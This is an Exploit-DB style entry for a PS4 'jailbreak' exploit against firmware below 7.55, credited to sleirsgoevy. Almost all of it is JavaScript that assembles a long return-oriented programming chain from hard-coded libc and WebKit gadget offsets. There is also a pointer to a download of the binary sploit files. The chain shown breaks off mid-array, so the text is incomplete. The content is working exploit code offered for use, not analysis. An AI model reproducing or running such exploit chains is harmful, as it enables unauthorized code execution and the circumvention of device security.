Sony Playstation 4 (PS4) < 7.55 - 'Jailbreak' Webkit / Kernel Loader 'SOCK_RAW' 'IP6_EXTHDR_CHECK'
Author : sleirsgoevy (2021-03-17)
Platform : Hardware
// EDB-Note: Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/49664.zip var ropchain_array = new Uint32Array(337302); var ropchain = read_ptr_at(addrof(ropchain_array)+0x10); var ropchain_offset = 2; function set_gadget(val) { ropchain_array[ropchain_offset++] = val | 0; ropchain_array[ropchain_offset++] = (val / 4294967296) | 0; } function set_gadgets(l) { for(var i = 0; i < l.length; i++) set_gadget(l[i]); } function db(data) { for(var i = 0; i < data.length; i++) ropchain_array[ropchain_offset++] = data[i]; } var main_ret = malloc(8); var printf_buf = malloc(65536); var __swbuf_addr = 0; // STUB set_gadgets([ libc_base+763368, //pop rcx ropchain+65720, //rdi_bak libc_base+533450, //mov [rcx], rdi libc_base+144605, //pop rdi ropchain+65680, //stack_bottom libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax ropchain+112, //ret_addr libc_base+426295, //mov [rdi], rax libc_base+782311, //pop rsp ropchain+1221872, //_main //ret_addr: libc_base+782311, //pop rsp ropchain+65680 //stack_bottom ]); //_ps4_printf_buffer: var printf_buf_offset = 128; set_gadget(printf_buf); //_ps4_printf_fd: db([4294967295, 4294967295]); // -0x1 //stack: ropchain_offset += 16384; //stack_bottom: set_gadgets([ libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi main_ret, webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //rdi_bak: //_pivot_back_addr: db([0, 0]); // 0x0 set_gadgets([ pivot_addr, //___builtin_bswap16: libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+65800, //L1 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 webkit_base+568675 //pop r8 ]); //L1: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi 
ropchain+65896, //L2 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+65928, //L5 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+763368 //pop rcx ]); //L2: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4: db([16, 0]); // 0x10 set_gadget(webkit_base+568675,); //pop r8 //L5: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+66032, //L8 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+66016, //L6 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L6: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8: db([0, 0]); // 0x0 set_gadgets([ libc_base+224144, //mov ax, [rdi] libc_base+764760, //pop rsi ropchain+66192, //L12 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+66160, //L10 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+66176, //L11 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L9: db([16, 0]); // 0x10 set_gadget(webkit_base+3236123,); //pop r9 //L10: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+66248, //L14 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L14: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+66376, //L16 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+66392, //L17 
webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+66360, //L15 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L15: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L16: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L17: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+66552, //L21 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+66520, //L19 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+66536, //L20 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L18: db([48, 0]); // 0x30 set_gadget(webkit_base+3236123,); //pop r9 //L19: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L20: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L21: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+66656, //L23 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+66640, //L22 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L22: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L23: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L24: db([8, 0]); // 0x8 set_gadget(libc_base+763368,); //pop rcx //L25: db([8, 0]); // 0x8 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+848070, //shl rax, cl 
libc_base+764760, //pop rsi ropchain+66864, //L28 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+66848, //L27 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L26: db([48, 0]); // 0x30 set_gadget(webkit_base+3236123,); //pop r9 //L27: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L28: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+66968, //L30 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+66952, //L29 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L29: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L30: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+67048, //L31 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L31: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L33: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+67168, //L36 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+67152, //L34 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L34: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L36: db([0, 0]); // 0x0 set_gadgets([ libc_base+224144, //mov ax, [rdi] libc_base+764760, //pop rsi ropchain+67328, //L40 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+67296, //L38 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+67312, //L39 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L37: db([16, 0]); // 0x10 set_gadget(webkit_base+3236123,); //pop r9 //L38: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L39: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L40: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+67384, //L42 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L42: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+67512, //L44 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+67528, //L45 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+67496, //L43 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L43: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L44: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L45: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+67688, //L49 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+67656, //L47 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+67672, //L48 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L46: db([48, 0]); // 0x30 set_gadget(webkit_base+3236123,); //pop r9 //L47: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L48: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L49: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl 
libc_base+764760, //pop rsi ropchain+67792, //L51 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+67776, //L50 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L50: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L51: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L52: db([8, 0]); // 0x8 set_gadget(libc_base+763368,); //pop rcx //L53: db([8, 0]); // 0x8 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+67992, //L56 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+67976, //L55 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L54: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L55: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L56: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+68096, //L58 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+68080, //L57 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L57: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L58: db([0, 0]); // 0x0 set_gadgets([ libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+68208, //L61 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+68192, //L60 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L59: 
db([48, 0]); // 0x30 set_gadget(webkit_base+3236123,); //pop r9 //L60: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L61: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+68272, //L63 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+763368 //pop rcx ]); //L63: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+68328, //L64 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L64: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+105700, //or rax, rcx libc_base+764760, //pop rsi ropchain+68480, //L67 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+68496, //L68 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+68464, //L66 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L66: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L67: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L68: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+68608, //L69 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+68640, //L71 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+68624, //L70 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L69: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L70: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L71: db([0, 
0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+68744, //L72 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+68760, //L73 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+568675 //pop r8 ]); //L72: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L73: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+68880, //L74 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+68864, //L75 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L75: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L74: db([0, 0]); // 0x0 set_gadgets([ libc_base+764760, //pop rsi ropchain+68968, //L77 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+68952, //L76 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L76: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L77: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+69072, //L78 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+69088, //L79 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+568675 //pop r8 ]); //L78: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L79: db([0, 0]); // 
0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+69208, //L80 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+69192, //L81 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L81: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L80: db([0, 0]); // 0x0 //___builtin_bswap32: set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+69280, //L83 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 webkit_base+568675 //pop r8 ]); //L83: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+69376, //L84 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+69408, //L87 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+763368 //pop rcx ]); //L84: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L86: db([16, 0]); // 0x10 set_gadget(webkit_base+568675,); //pop r8 //L87: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+69512, //L90 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+69496, //L88 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L88: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L90: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+69688, //L93 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+69704, //L94 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+69656, //L91 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+69672, //L92 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L91: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L92: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L93: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L94: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+69800, //L96 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+69784, //L95 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L95: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L96: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L97: db([24, 0]); // 0x18 set_gadget(libc_base+763368,); //pop rcx //L98: db([24, 0]); // 0x18 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+70000, //L101 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+69984, //L100 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L99: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L100: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L101: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, 
//shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+70104, //L103 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+70088, //L102 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L102: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L103: db([0, 0]); // 0x0 set_gadgets([ libc_base+848080, //shr rax, cl libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+70192, //L104 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L104: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L106: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+70312, //L109 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+70296, //L107 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L107: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L109: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+70488, //L112 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+70504, //L113 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+70456, //L110 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+70472, //L111 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L110: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L111: db([0, 0]); // 0x0 
set_gadget(libc_base+144605,); //pop rdi //L112: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L113: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+70600, //L115 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+70584, //L114 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L114: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L115: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L117: db([16711680, 0]); // 0xff0000 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+70712, //L118 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L118: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+14664103, //and rax, rcx libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L120: db([8, 0]); // 0x8 set_gadget(libc_base+763368,); //pop rcx //L121: db([8, 0]); // 0x8 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+70944, //L124 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+70928, //L123 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L122: db([32, 0]); // 0x20 
set_gadget(webkit_base+3236123,); //pop r9 //L123: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L124: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+71048, //L126 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+71032, //L125 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L125: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L126: db([0, 0]); // 0x0 set_gadgets([ libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+71104, //L128 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L128: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+71160, //L129 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L129: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+105700, //or rax, rcx libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+71272, //L131 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L131: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L133: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+71392, //L136 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+71376, //L134 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L134: db([0, 0]); 
// 0x0 set_gadget(libc_base+144605,); //pop rdi //L136: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+71568, //L139 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+71584, //L140 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+71536, //L137 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+71552, //L138 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L137: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L138: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L139: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L140: db([0, 0]); // 0x0 set_gadgets([ 